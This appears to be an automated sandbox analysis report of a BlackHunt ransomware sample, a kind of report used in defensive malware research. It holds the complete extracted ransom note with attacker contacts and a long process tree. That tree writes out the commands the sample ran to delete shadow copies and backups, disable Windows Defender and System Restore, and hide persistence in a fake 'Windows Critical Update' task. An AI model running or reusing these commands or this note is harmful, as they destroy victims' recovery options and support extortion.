Windows 7 deprecation

Windows 7 will be removed from tria.ge on 2025-03-31

Analysis

  • max time kernel
    120s
  • max time network
    122s
  • platform
    windows7_x64
  • resource
    win7-20231129-en
  • resource tags

    arch:x64arch:x86image:win7-20231129-enlocale:en-usos:windows7-x64system
  • submitted
    18/01/2024, 22:52 UTC

General

  • Target

    2ba1f078b4f8a609f3b7aaf8852f3c6eb44ac0bb4c9368ec14c026259c9ede87.exe

  • Size

    707KB

  • MD5

    8f1b4a1ad35803c3e7306790ac78dadf

  • SHA1

    559111015958073f9f462b82fbc1a44cdb420441

  • SHA256

    2ba1f078b4f8a609f3b7aaf8852f3c6eb44ac0bb4c9368ec14c026259c9ede87

  • SHA512

    b2199fa282ad6740f3e981e6c3b92fef7bd834ac6fb42134dd7953038aee2faea72c3efdf4684e1fb2ab2c6755942ed782ca0748ef860a895390c328da8f6c07

  • SSDEEP

    6144:wcmwdMZ0aq9arLKkdMqJ+VYg/5ICAAQs+d5zSTamgEoOFzxLza1j8Wvnh:6uaTmkZJ+naie5OTamgEoKxLWCoh

Malware Config

Extracted

Path

C:\ProgramData\#BlackHunt_ReadMe.hta

Ransom Note
<!DOCTYPE html><html lang="en"><head><meta charset="UTF-8"><meta name="viewport" content="width=device-width, initial-scale=1.0"> <meta http-equiv="x-ua-compatible" content="ie=9"><meta charset="UTF-8"><HTA:APPLICATION icon="#" WINDOWSTATE="maximize" scroll="no" SELECTION="yes" contextmenu="no" caption="yes" SYSMENU="no" innerBorder="yes" SHOWINTASKBAR="yes" singleInstance="yes" /><meta name="viewport" content="width = device-width,initial-scale=1.0"><style>a,abbr,acronym,address,applet,article,aside,audio,b,big,blockquote,body,canvas,caption,center,cite,code,dd,del,details,dfn,div,dl,dt,em,embed,fieldset,figcaption,figure,footer,form,h1,h2,h3,h4,h5,h6,header,hgroup,html,i,iframe,img,ins,kbd,label,legend,li,mark,menu,nav,object,ol,output,p,pre,q,ruby,s,samp,section,small,span,strike,strong,sub,summary,sup,table,tbody,td,tfoot,th,thead,time,tr,tt,u,ul,var,video{margin:0;padding:0;border:0;font-size:100%;font:inherit;vertical-align:baseline}article,aside,details,figcaption,figure,footer,header,hgroup,menu,nav,section{display:block}body{line-height:1}ol,ul{list-style:none}blockquote,q{quotes:none}blockquote:after,blockquote:before,q:after,q:before{content:'';content:none}table{border-collapse:collapse;border-spacing:0}</style><style>body,html{background-color:#dadada;font-family:'Segoe UI',Tahoma,Geneva,Verdana,sans-serif;font-weight:600;font-size:16px}a{text-decoration:none;color:#0483ab}div.header{margin-top:15px;margin-bottom:5px;width:100%}div.header h1{width:97%;text-align:left;font-size:30px;font-weight:900;margin:auto}div.header h1 span#black{display:inline-block;color:#000;margin-right:0;padding:2px 2px}div.header h1 span#hunter{display:inline-block;color:#e90303;background-color:#000;padding:2px 8px;margin-left:0}div.header h1 span#hunter span#version{font-size:12px}div.message div.head-encrypted-msg{width:100%}div.message div.head-encrypted-msg h1{font-size:330%;width:97%;margin:auto;text-align:center;font-weight:700}div.message div.head-encrypted-msg h1 span{display:inline-block;color:#000;background-color:#e90303;padding:0 8px 0 8px;margin-right:3px}div.message div.head-attention-msg{width:97%;margin:auto;text-align:center;margin-top:1%;border:1px solid #e90303;background-color:#f1caca;border-radius:5px;font-size:250%;padding-top:10px;padding-bottom:10px}div.message div.head-attention-msg p{margin-bottom:.5%}div.message div.head-attention-msg p span{color:#e90303}div.content{margin:auto;margin-top:2%}div.content div.content-head-msg{font-size:32px;text-align:left;font-weight:600}div.content div.content-boxes{margin:auto;margin-top:2%}div.content div.box{width:96%;margin:auto;border-radius:5px;margin-bottom:30px}div.content div.content-left-box{background-color:#c5cfd8;padding:40px 0 40px 20px;font-size:24px;position:relative;border-left:15px solid #1878cf}div.content div.content-left-box h3.left-box-title{background-color:#1878cf;display:inline-block;padding:10px 10px;border-radius:5px;color:#fff;position:absolute;top:-22px;margin-left:auto;margin-right:auto;left:0;right:0;width:20%;text-align:center}div.content div.content-left-box div.content-contact-directly *{font-weight:600!important;line-height:1.4em}div.content div.content-left-box div.content-contact-directly h4{font-size:24px;font-weight:500;margin-top:8px}div.content div.content-left-box div.content-contact-directly h4#tox{font-weight:600;display:inline-block;margin-left:3px}div.content div.content-left-box div.content-contact-directly div.tox-id{margin-left:6%}div.content div.content-left-box div.content-contact-directly h4#tox-id{font-size:24px}div.content div.content-left-box div.content-contact-directly p#tox-id-p{font-size:16px}div.content div.content-left-box div.content-contact-directly h4#download-tox{display:inline-block;margin-left:6%}div.content div.content-left-box div.content-contact-directly p#download-tox-p{display:inline-block}div.content div.content-left-box div.content-contact-directly h4#email{display:inline-block;font-weight:600;margin-left:3px}div.content div.content-left-box div.content-contact-directly p#email-p{display:inline-block;font-size:24px;margin-left:8px}div.content div.content-left-box div.content-contact-directly h4#user-id{font-weight:500;margin-left:3px}div.content div.content-left-box div.content-contact-directly h4#user-id span{color:#e90303}div.content div.content-left-box div.content-contact-tor{margin-top:50px;font-weight:600!important}div.content div.content-left-box div.content-contact-tor h3{font-size:24px}div.content div.content-left-box div.content-contact-tor h3 span{color:#e90303}div.content div.content-left-box div.content-contact-tor div.content-tor-inside{margin-left:6;margin-top:10px}div.content div.content-left-box div.content-contact-tor div.content-tor-inside p{margin-top:8px}div.content div.content-left-box div.content-contact-tor div.content-tor-inside p img{position:relative;bottom:-3px}div.content div.content-right-box{background-color:#efb0b0;padding:40px 0 40px 20px;font-size:24px;position:relative;border-left:15px solid #e90303}div.content div.content-right-box h3.right-box-title{background-color:#e90303;display:inline-block;padding:10px 10px;border-radius:5px;color:#fff;position:absolute;top:-22px;margin-left:auto;margin-right:auto;left:0;right:0;width:20%;text-align:center}div.content div.content-right-box p{color:#000;font-size:22px;font-weight:600;margin-top:9px;line-height:1.4em}div.content div.content-left-box p{color:#000;font-size:22px;font-weight:600;margin-top:9px;line-height:1.4em}div.content div.content-left-box p span{color:#e90303;font-weight:700;font-size:24px}</style><title>Black Hunt</title></head><body><div class="header"><h1><img src="data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAAIMAAAAWCAYAAADjNi+WAAAACXBIWXMAAC4jAAAuIwF4pT92AAALpWlUWHRYTUw6Y29tLmFkb2JlLnhtcAAAAAAAPD94cGFja2V0IGJlZ2luPSLvu78iIGlkPSJXNU0wTXBDZWhpSHpyZVN6TlRjemtjOWQiPz4gPHg6eG1wbWV0YSB4bWxuczp4PSJhZG9iZTpuczptZXRhLyIgeDp4bXB0az0iQWRvYmUgWE1QIENvcmUgNi4wLWMwMDIgNzkuMTY0NDYwLCAyMDIwLzA1LzEyLTE2OjA0OjE3ICAgICAgICAiPiA8cmRmOlJERiB4bWxuczpyZGY9Imh0dHA6Ly93d3cudzMub3JnLzE5OTkvMDIvMjItcmRmLXN5bnRheC1ucyMiPiA8cmRmOkRlc2NyaXB0aW9uIHJkZjphYm91dD0iIiB4bWxuczp4bXA9Imh0dHA6Ly9ucy5hZG9iZS5jb20veGFwLzEuMC8iIHhtbG5zOmRjPSJodHRwOi8vcHVybC5vcmcvZGMvZWxlbWVudHMvMS4xLyIgeG1sbnM6eG1wTU09Imh0dHA6Ly9ucy5hZG9iZS5jb20veGFwLzEuMC9tbS8iIHhtbG5zOnN0RXZ0PSJodHRwOi8vbnMuYWRvYmUuY29tL3hhcC8xLjAvc1R5cGUvUmVzb3VyY2VFdmVudCMiIHhtbG5zOnN0UmVmPSJodHRwOi8vbnMuYWRvYmUuY29tL3hhcC8xLjAvc1R5cGUvUmVzb3VyY2VSZWYjIiB4bWxuczpwaG90b3Nob3A9Imh0dHA6Ly9ucy5hZG9iZS5jb20vcGhvdG9zaG9wLzEuMC8iIHhtbG5zOnRpZmY9Imh0dHA6Ly9ucy5hZG9iZS5jb20vdGlmZi8xLjAvIiB4bWxuczpleGlmPSJodHRwOi8vbnMuYWRvYmUuY29tL2V4aWYvMS4wLyIgeG1wOkNyZWF0b3JUb29sPSJBZG9iZSBQaG90b3Nob3AgMjEuMiAoV2luZG93cykiIHhtcDpDcmVhdGVEYXRlPSIyMDIyLTEwLTEzVDEyOjMyOjAyKzAzOjMwIiB4bXA6TWV0YWRhdGFEYXRlPSIyMDIzLTA0LTA3VDA0OjIxOjI1KzA0OjMwIiB4bXA6TW9kaWZ5RGF0ZT0iMjAyMy0wNC0wN1QwNDoyMToyNSswNDozMCIgZGM6Zm9ybWF0PSJpbWFnZS9wbmciIHhtcE1NOkluc3RhbmNlSUQ9InhtcC5paWQ6NGRiOTQ5OGItYTg5Mi0yMTRjLTliYzgtZTZlMDM3ZTYzYmJkIiB4bXBNTTpEb2N1bWVudElEPSJhZG9iZTpkb2NpZDpwaG90b3Nob3A6ZGVlODIyNjgtMDA3Ni0wNDQ2LWFjMGEtMzk2OTY3MzA0YTdjIiB4bXBNTTpPcmlnaW5hbERvY3VtZW50SUQ9InhtcC5kaWQ6MjcyMzA2NjctZDM0ZC1lMjRmLWJlNTUtMDQyMWY2MmY3ZWI1IiBwaG90b3Nob3A6Q29sb3JNb2RlPSIzIiBwaG90b3Nob3A6SUNDUHJvZmlsZT0ic1JHQiBJRUM2MTk2Ni0yLjEiIHRpZmY6T3JpZW50YXRpb249IjEiIHRpZmY6WFJlc29sdXRpb249IjMwMDAwMDAvMTAwMDAiIHRpZmY6WVJlc29sdXRpb249IjMwMDAwMDAvMTAwMDAiIHRpZmY6UmVzb2x1dGlvblVuaXQ9IjIiIGV4aWY6Q29sb3JTcGFjZT0iMSIgZXhpZjpQaXhlbFhEaW1lbnNpb249IjQ0OSIgZXhpZjpQaXhlbFlEaW1lbnNpb249Ijg5Ij4gPHhtcE1NOkhpc3Rvcnk+IDxyZGY6U2VxPiA8cmRmOmxpIHN0RXZ0OmFjdGlvbj0iY3JlYXRlZCIgc3RFdnQ6aW5zdGFuY2VJRD0ieG1wLmlpZDoyNzIzMDY2Ny1kMzRkLWUyNGYtYmU1NS0wNDIxZjYyZjdlYjUiIHN0RXZ0OndoZW49IjIwMjItMTAtMTNUMTI6MzI6MDIrMDM6MzAiIHN0RXZ0OnNvZnR3YXJlQWdlbnQ9IkFkb2JlIFBob3Rvc2hvcCAyMS4yIChXaW5kb3dzKSIvPiA8cmRmOmxpIHN0RXZ0OmFjdGlvbj0ic2F2ZWQiIHN0RXZ0Omluc3RhbmNlSUQ9InhtcC5paWQ6NzU5MzVkMTMtYjM0OS02ZTRiLWIwODctYzc5ZTJmZGNiNzgwIiBzdEV2dDp3aGVuPSIyMDIyLTEwLTEzVDEyOjMyOjE0KzAzOjMwIiBzdEV2dDpzb2Z0d2FyZUFnZW50PSJBZG9iZSBQaG90b3Nob3AgMjEuMiAoV2luZG93cykiIHN0RXZ0OmNoYW5nZWQ9Ii8iLz4gPHJkZjpsaSBzdEV2dDphY3Rpb249InNhdmVkIiBzdEV2dDppbnN0YW5jZUlEPSJ4bXAuaWlkOmJiMmZiMmMyLWRjNDUtMzE0Yy1iMmQxLWRjNzFlZGUwNWJlYSIgc3RFdnQ6d2hlbj0iMjAyMy0wNC0wN1QwNDoyMToyNSswNDozMCIgc3RFdnQ6c29mdHdhcmVBZ2VudD0iQWRvYmUgUGhvdG9zaG9wIDIxLjIgKFdpbmRvd3MpIiBzdEV2dDpjaGFuZ2VkPSIvIi8+IDxyZGY6bGkgc3RFdnQ6YWN0aW9uPSJjb252ZXJ0ZWQiIHN0RXZ0OnBhcmFtZXRlcnM9ImZyb20gYXBwbGljYXRpb24vdm5kLmFkb2JlLnBob3Rvc2hvcCB0byBpbWFnZS9wbmciLz4gPHJkZjpsaSBzdEV2dDphY3Rpb249ImRlcml2ZWQiIHN0RXZ0OnBhcmFtZXRlcnM9ImNvbnZlcnRlZCBmcm9tIGFwcGxpY2F0aW9uL3ZuZC5hZG9iZS5waG90b3Nob3AgdG8gaW1hZ2UvcG5nIi8+IDxyZGY6bGkgc3RFdnQ6YWN0aW9uPSJzYXZlZCIgc3RFdnQ6aW5zdGFuY2VJRD0ieG1wLmlpZDo0ZGI5NDk4Yi1hODkyLTIxNGMtOWJjOC1lNmUwMzdlNjNiYmQiIHN0RXZ0OndoZW49IjIwMjMtMDQtMDdUMDQ6MjE6MjUrMDQ6MzAiIHN0RXZ0OnNvZnR3YXJlQWdlbnQ9IkFkb2JlIFBob3Rvc2hvcCAyMS4yIChXaW5kb3dzKSIgc3RFdnQ6Y2hhbmdlZD0iLyIvPiA8L3JkZjpTZXE+IDwveG1wTU06SGlzdG9yeT4gPHhtcE1NOkRlcml2ZWRGcm9tIHN0UmVmOmluc3RhbmNlSUQ9InhtcC5paWQ6YmIyZmIyYzItZGM0NS0zMTRjLWIyZDEtZGM3MWVkZTA1YmVhIiBzdFJlZjpkb2N1bWVudElEPSJhZG9iZTpkb2NpZDpwaG90b3Nob3A6YTU3NzljMGQtYzI3Zi05ZjQ2LWJmMjgtYjQ2MzIzZjQ5ZjQxIiBzdFJlZjpvcmlnaW5hbERvY3VtZW50SUQ9InhtcC5kaWQ6MjcyMzA2NjctZDM0ZC1lMjRmLWJlNTUtMDQy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 " alt=""></h1></div><div class="message"><div class="head-encrypted-msg"><h1>YOUR<span>WHOLE NETWORK</span>HAS BEEN PENETRATED BY<span>Black Hunt</span>!</h1></div><div class="head-attention-msg"><p>We also have uploaded your sensitive data, which we Will leak or sell in case of no cooperation!</p><p><span>Restore your data possible only buying private key from us</span></p></div></div><div class="content"><div class="content-boxes"><div class="content-right-box box"><h3 class="right-box-title">ATTENTION</h3><p>remember, there are many middle man services out there pretending that they can recover or decrypt your files , whom neither will contact us or scam you, Remember we are first and last solution for your files otherwise you will only waste money and time</p><p>trying to decrypt your files without our decryptor and through third party softwares will make your files completely useless, there is no third party decryptor since we are the only key holders</p><p>we have uploaded many critical data and information from your machines , we won't leak or sell any of them in Case of successful Corporation, however if we don't hear from you in 14 days we will either sell or leak your data in many forums</p><p></p><p>Remain all of your files untouched, do not change their name, extension and...</p></div><div class="content-left-box box"><h3 class="left-box-title">CONTACT US</h3><p>Your system is offline. in order to contact us you can email this address<span> w4ifO5uDw@gmail.com </span>this ID (<span> UvFxDtvfNr0Jgb1m </span>) for the title of your email.</p><p>If you weren't able to contact us whitin 24 hours please email:<span> Teikobest@gmail.com </span></p><p>Check your data situation in<a href="#"><span> http://sdjf982lkjsdvcjlksaf2kjhlksvvnktyoiasuc92lf.onion </span></a></p></div></div></div></body></html>
Emails

w4ifO5uDw@gmail.com

Teikobest@gmail.com

URLs

http-equiv="x-ua-compatible"

http://sdjf982lkjsdvcjlksaf2kjhlksvvnktyoiasuc92lf.onion

Signatures

  • Deletes NTFS Change Journal 2 TTPs 2 IoCs

    The USN change journal is a persistent log of all changes made to local files used by Windows Server systems.

  • Modifies Windows Defender Real-time Protection settings 3 TTPs 2 IoCs
  • UAC bypass 3 TTPs 1 IoCs
  • Clears Windows event logs 1 TTPs 5 IoCs
  • Deletes shadow copies 2 TTPs

    Ransomware often targets backup files to inhibit system recovery.

  • Modifies boot configuration data using bcdedit 1 TTPs 4 IoCs
  • Renames multiple (2842) files with added filename extension

    This suggests ransomware activity of encrypting all the files on the system.

  • Deletes backup catalog 3 TTPs 2 IoCs

    Uses wbadmin.exe to inhibit system recovery.

  • Disables Task Manager via registry modification
  • Disables use of System Restore points 1 TTPs
  • Deletes itself 1 IoCs
  • Adds Run key to start application 2 TTPs 1 IoCs
  • Checks whether UAC is enabled 1 TTPs 1 IoCs
  • Enumerates connected drives 3 TTPs 27 IoCs

    Attempts to read the root path of hard drives other than the default C: drive.

  • Looks up external IP address via web service 1 IoCs

    Uses a legitimate IP lookup service to find the infected system's external IP.

  • Sets desktop wallpaper using registry 2 TTPs 1 IoCs
  • Drops file in Program Files directory 64 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Creates scheduled task(s) 1 TTPs 1 IoCs

    Schtasks is often used by malware for persistence or to perform post-infection execution.

  • Interacts with shadow copies 2 TTPs 6 IoCs

    Shadow copies are often targeted by ransomware to inhibit system recovery.

  • Kills process with taskkill 1 IoCs
  • Modifies registry class 10 IoCs
  • Runs ping.exe 1 TTPs 1 IoCs
  • Suspicious behavior: CmdExeWriteProcessMemorySpam 1 IoCs
  • Suspicious use of AdjustPrivilegeToken 24 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs
  • System policy modification 1 TTPs 3 IoCs
  • Uses Task Scheduler COM API 1 TTPs

    The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.

  • Uses Volume Shadow Copy service COM API

    The Volume Shadow Copy service is used to manage backups/snapshots.

Processes

  • C:\Users\Admin\AppData\Local\Temp\2ba1f078b4f8a609f3b7aaf8852f3c6eb44ac0bb4c9368ec14c026259c9ede87.exe
    "C:\Users\Admin\AppData\Local\Temp\2ba1f078b4f8a609f3b7aaf8852f3c6eb44ac0bb4c9368ec14c026259c9ede87.exe"
    1⤵
    • UAC bypass
    • Checks whether UAC is enabled
    • Enumerates connected drives
    • Sets desktop wallpaper using registry
    • Drops file in Program Files directory
    • Suspicious use of AdjustPrivilegeToken
    • Suspicious use of WriteProcessMemory
    • System policy modification
    PID:2252
    • C:\Windows\System32\cmd.exe
      "C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Classes\Hunt2\DefaultIcon" /ve /t REG_SZ /d "C:\ProgramData\#BlackHunt_Icon.ico" /f
      2⤵
        PID:1680
      • C:\Windows\System32\cmd.exe
        "C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender" /v "DisableAntiSpyware" /t REG_DWORD /d 1 /f
        2⤵
          PID:2736
          • C:\Windows\system32\reg.exe
            reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender" /v "DisableAntiSpyware" /t REG_DWORD /d 1 /f
            3⤵
              PID:884
          • C:\Windows\System32\cmd.exe
            "C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Threats" /v "Threats_ThreatSeverityDefaultAction" /t REG_DWORD /d 1 /f
            2⤵
              PID:2612
              • C:\Windows\system32\reg.exe
                reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Threats" /v "Threats_ThreatSeverityDefaultAction" /t REG_DWORD /d 1 /f
                3⤵
                  PID:1488
              • C:\Windows\System32\cmd.exe
                "C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Threats\ThreatSeverityDefaultAction" /v "Severe" /t REG_DWORD /d 6 /f
                2⤵
                  PID:2544
                  • C:\Windows\system32\reg.exe
                    reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Threats\ThreatSeverityDefaultAction" /v "Severe" /t REG_DWORD /d 6 /f
                    3⤵
                      PID:2308
                  • C:\Windows\System32\cmd.exe
                    "C:\Windows\System32\cmd.exe" /c reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "NoClose" /t REG_DWORD /d 1 /f
                    2⤵
                      PID:1644
                      • C:\Windows\system32\reg.exe
                        reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "NoClose" /t REG_DWORD /d 1 /f
                        3⤵
                          PID:2984
                      • C:\Windows\System32\cmd.exe
                        "C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\UX Configuration" /v "Notification_Suppress" /t REG_DWORD /d 1 /f
                        2⤵
                          PID:2512
                          • C:\Windows\system32\reg.exe
                            reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\UX Configuration" /v "Notification_Suppress" /t REG_DWORD /d 1 /f
                            3⤵
                              PID:876
                          • C:\Windows\System32\cmd.exe
                            "C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client" /v "DisableSystemBackupUI" /t REG_DWORD /d 1 /f
                            2⤵
                              PID:1836
                              • C:\Windows\system32\reg.exe
                                reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client" /v "DisableSystemBackupUI" /t REG_DWORD /d 1 /f
                                3⤵
                                  PID:2708
                              • C:\Windows\System32\cmd.exe
                                "C:\Windows\System32\cmd.exe" /c SCHTASKS.exe /Create /RU "NT AUTHORITY\SYSTEM" /sc onstart /TN "Windows Critical Update" /TR "C:\Users\Admin\AppData\Local\Temp\2ba1f078b4f8a609f3b7aaf8852f3c6eb44ac0bb4c9368ec14c026259c9ede87.exe" /F
                                2⤵
                                  PID:2812
                                  • C:\Windows\system32\schtasks.exe
                                    SCHTASKS.exe /Create /RU "NT AUTHORITY\SYSTEM" /sc onstart /TN "Windows Critical Update" /TR "C:\Users\Admin\AppData\Local\Temp\2ba1f078b4f8a609f3b7aaf8852f3c6eb44ac0bb4c9368ec14c026259c9ede87.exe" /F
                                    3⤵
                                    • Creates scheduled task(s)
                                    PID:1336
                                • C:\Windows\System32\cmd.exe
                                  "C:\Windows\System32\cmd.exe" /c fsutil.exe usn deletejournal /D C:
                                  2⤵
                                    PID:1828
                                    • C:\Windows\system32\fsutil.exe
                                      fsutil.exe usn deletejournal /D C:
                                      3⤵
                                      • Deletes NTFS Change Journal
                                      PID:2280
                                  • C:\Windows\System32\cmd.exe
                                    "C:\Windows\System32\cmd.exe" /c wbadmin.exe delete catalog -quiet
                                    2⤵
                                      PID:788
                                      • C:\Windows\system32\wbadmin.exe
                                        wbadmin.exe delete catalog -quiet
                                        3⤵
                                        • Deletes backup catalog
                                        PID:2088
                                    • C:\Windows\System32\cmd.exe
                                      "C:\Windows\System32\cmd.exe" /c schtasks.exe /Change /TN "\Microsoft\Windows\SystemRestore\SR" /disable
                                      2⤵
                                        PID:1940
                                      • C:\Windows\System32\cmd.exe
                                        "C:\Windows\System32\cmd.exe" /c bcdedit /set {default} bootstatuspolicy IgnoreAllFailures
                                        2⤵
                                          PID:1016
                                        • C:\Windows\System32\cmd.exe
                                          "C:\Windows\System32\cmd.exe" /c bcdedit /set {default} recoveryenabled No
                                          2⤵
                                            PID:588
                                          • C:\Windows\System32\cmd.exe
                                            "C:\Windows\System32\cmd.exe" /c vssadmin.exe Delete Shadows /all /quiet
                                            2⤵
                                              PID:1464
                                            • C:\Windows\System32\cmd.exe
                                              "C:\Windows\System32\cmd.exe" /c vssadmin resize shadowstorage /for=C:\ /on=C:\ /maxsize=unbounded
                                              2⤵
                                                PID:1252
                                              • C:\Windows\System32\cmd.exe
                                                "C:\Windows\System32\cmd.exe" /c vssadmin resize shadowstorage /for=C:\ /on=C:\ /maxsize=401MB
                                                2⤵
                                                  PID:392
                                                • C:\Windows\System32\cmd.exe
                                                  "C:\Windows\System32\cmd.exe" /c vssadmin resize shadowstorage /for=F:\ /on=F:\ /maxsize=unbounded
                                                  2⤵
                                                    PID:2140
                                                  • C:\Windows\System32\cmd.exe
                                                    "C:\Windows\System32\cmd.exe" /c vssadmin resize shadowstorage /for=F:\ /on=F:\ /maxsize=401MB
                                                    2⤵
                                                      PID:1964
                                                    • C:\Windows\System32\cmd.exe
                                                      "C:\Windows\System32\cmd.exe" /c reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "NoRun" /t REG_DWORD /d 1 /f
                                                      2⤵
                                                        PID:2684
                                                      • C:\Windows\System32\cmd.exe
                                                        "C:\Windows\System32\cmd.exe" /c reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableTaskMgr" /t REG_DWORD /d 1 /f
                                                        2⤵
                                                          PID:1660
                                                        • C:\Windows\System32\cmd.exe
                                                          "C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client" /v "DisableBackupUI" /t REG_DWORD /d 1 /f
                                                          2⤵
                                                            PID:1640
                                                          • C:\Windows\System32\cmd.exe
                                                            "C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client" /v "DisableRestoreUI" /t REG_DWORD /d 1 /f
                                                            2⤵
                                                            • Suspicious use of AdjustPrivilegeToken
                                                            PID:2532
                                                          • C:\Windows\System32\cmd.exe
                                                            "C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client" /v "DisableBackupLauncher" /t REG_DWORD /d 1 /f
                                                            2⤵
                                                              PID:1312
                                                            • C:\Windows\System32\cmd.exe
                                                              "C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\WinRE" /v "DisableSetup" /t REG_DWORD /d 1 /f
                                                              2⤵
                                                                PID:1300
                                                              • C:\Windows\System32\cmd.exe
                                                                "C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows NT\SystemRestore" /v "DisableSR" /t REG_DWORD /d 1 /f
                                                                2⤵
                                                                  PID:1220
                                                                • C:\Windows\System32\cmd.exe
                                                                  "C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows NT\SystemRestore" /v "DisableConfig" /t REG_DWORD /d 1 /f
                                                                  2⤵
                                                                    PID:1372
                                                                  • C:\Windows\System32\cmd.exe
